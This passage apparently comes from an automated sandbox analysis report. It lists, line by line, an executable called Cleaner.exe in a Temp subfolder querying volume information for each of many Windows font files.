                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
